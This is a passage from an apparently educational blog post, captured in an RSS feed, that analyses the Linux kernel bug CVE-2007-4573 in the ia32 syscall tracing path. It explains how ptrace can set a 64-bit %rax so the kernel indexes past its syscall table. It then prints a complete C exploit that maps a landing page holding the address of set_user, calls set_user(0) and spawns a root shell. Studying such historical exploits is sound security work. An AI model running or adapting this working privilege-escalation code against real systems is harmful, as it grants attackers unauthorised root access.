<p>The problem arises in the &#8220;traced&#8221; path in <code>ia32_tracesys</code>, which is (again, with some
extra code removed):</p>

<pre><code>ia32_tracesys:
        movq %rsp,%rdi        /* &amp;pt_regs -&gt; arg1 */
        call syscall_trace_enter
        LOAD_ARGS ARGOFFSET  /* reload args from stack in case ptrace changed it */
        jmp ia32_do_call
</code></pre>

<p>Essentially, <code>ia32_tracesys</code> just calls into the C function
<code>syscall_trace_enter</code>, with a pointer to the registers saved on the stack,
and then restores the register values from the stack and jumps back to
execute the system call.</p>

<p>Herein lies the problem. If <code>syscall_trace_enter</code> replaces the on-stack <code>%rax</code> with a 64-bit value, and <code>LOAD_ARGS</code> restores it, then the <code>%eax</code>/<code>%rax</code> distinction above becomes a problem.
Aas long as <code>%eax</code> is less than <code>(IA32_NR_syscalls-1)</code>, <code>%rax</code> can be much larger than the size of the syscall table, causing the <code>call</code> to index off the end of it.</p>

<h2>ptrace(2)</h2>

<p>So what happens inside <code>syscall_trace_enter</code>, and how can we take
advantage of that to load a 64-bit value into the restored <code>%rax</code>?
Well, that turns out to be the code that handles processes traced by
the <code>ptrace(2)</code> process-tracing mechanism, which among other things,
allows the tracer to stop a child process before each system call, and
inspect and modify the child&#8217;s registers for the system call procedes.</p>

<p>Reading <code>ptrace(2)</code>, we find that we can use <code>ptrace(PTRACE_SYSCALL,…)</code>
to cause a process to execute until its next system call, and then,
once it&#8217;s stopped, we can use <code>ptrace(PTRACE_POKEUSER,…)</code> to modify
the tracee&#8217;s registers.</p>

<h2>Putting it all together</h2>

<p>So, to exploit this bug, we need to:</p>

<ul>
<li>Have a 64-bit process attach to some process with <code>ptrace</code>.</li>
<li>Use <code>PTRACE_SYSCALL</code> to stop that process at its next syscall</li>
<li>Have the process execute an <code>int $0x80</code></li>
<li>Have the parent modify <code>%rax</code> in the child to be 64 bits wide, and
allow the child to continue.</li>
</ul>

<p>At this point, the child will index waaay off the end of the syscall
table &#8212; so far off, in fact, that it will wrap around past the end of
memory (On <code>x86_64</code>, the entire kernel is mapped into the last
2 GB of address space). Since the kernel and user programs run in the same
address space, this means that, with an appropriate choice of <code>%rax</code>, the kernel will dereference an address
in the user address space to find out the address of the function it should jump to in order to handle the system call.</p>

<p>My entire exploit code follows.  This is not fully weaponized at all
&#8211; it depends on tweaking for the specific target kernel, for one, but
it works. (Well, if you can find an unpatched kernel anywhere any more
these days, it works). Nowadays, if I were writing an exploit like
this, I&#8217;d plug it into something like Brad Spengler&#8217;s
<a href="http://www.milw0rm.com/exploits/9627">Enlightenment</a>, which takes
care of most of the annoying bits of executing shell-code in-kernel to
change the current user, disable any security modules that might be
problematic, and work across kernel versions, as necessary.</p>

<pre><code>#include &lt;sys/ptrace.h&gt;
#include &lt;sys/user.h&gt;
#include &lt;sys/types.h&gt;
#include &lt;sys/wait.h&gt;
#include &lt;unistd.h&gt;
#include &lt;stdio.h&gt;
#include &lt;sys/mman.h&gt;
#include &lt;string.h&gt;
#include &lt;stdlib.h&gt;
#include &lt;stddef.h&gt;

/**
 * Replace these with the values of `ia32_sys_call_table' and
 * `set_user' from /proc/kallsyms or /boot/System.map-$(uname -r)
 */
#define syscall_table 0xffffffff8044b8a0
#define set_user      0xffffffff8028d785

/*
 We don't _need_ these -- with only a little bit of cleverness, we can
 get around not knowing them, but having them will make the code
 simpler.

 set_user is defined in kernel/sys.c, and can be used to change the
 UID of the current process. We'll trick the kernel into call it on
 our behalf, and thus avoid having to write any code to run in
 kernel-mode ourselves.
*/

#define offset        (1L &lt;&lt; 32)
#define landing       (syscall_table + 8*offset)
/*
  'offset' is the 64-bit value we will load into %rax using ptrace().

  This will cause the "call" instruction we saw above to look up the
  value stored at that index off the syscall table, which is the
  address we compute in "landing".
 */


int main() {
        if((signed long)mmap((void*)(landing&amp;~0xFFF), 4096,
                              PROT_READ|PROT_EXEC|PROT_WRITE,
                              MAP_FIXED|MAP_PRIVATE|MAP_ANONYMOUS,
                                0, 0) &lt; 0) {
                perror("mmap");
                exit(-1);
        }
        *(long*)landing = set_user;
        /*
          We use mmap(2) to map a page at "landing", and write a
          pointer to the set_user function there.
         */

        pid_t child;
        child = fork();
        /*
          We fork two processes. The parent will ptrace the child, and
          the child will execute the `int 0x80` syscall.
         */
        if(child == 0) {
                ptrace(PTRACE_TRACEME, 0, NULL, NULL);
                kill(getpid(), SIGSTOP);
                /*
                  We ask for someone to trace us, and then signal
                  ourselves, which causes us to wait for our parent to
                  attach via `ptrace`.
                 */
                __asm__("movl $0, %ebx\n\t"
                        "int $0x80\n");
                /*
                  We then make an (arbitrary) syscall via int 0x80,
                  with %ebx set to 0. Linux's system call convention
                  stores the first argument in %ebx, so if all goes
                  right, when our parent mucks with %rax, this will
                  result in the kernel calling set_user(0), setting
                  our current UID to 0.
                */

                execl("/bin/sh", "/bin/sh", NULL);
                /* Once we have root, we exec a shell. */
        } else {
                wait(NULL);
                ptrace(PTRACE_SYSCALL, child, NULL, NULL);
                wait(NULL);
                ptrace(PTRACE_POKEUSER, child, offsetof(struct user, regs.orig_rax),
                        (void*)offset);
                ptrace(PTRACE_DETACH, child, NULL, NULL);
                wait(NULL);
                /*
                  In the parent we need to do is `wait` for the child
                  to stop, allow it to advance until the next syscall,
                  use `PTRACE_POKEUSER` to poke `offset` into `%rax`,
                  and then detach and let it run.
                 */
        }
}
</code></pre>
]]></content:encoded>
			<wfw:commentRss>http://blog.nelhage.com/2010/02/cve-2007-4573-the-anatomy-of-a-kernel-exploit/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

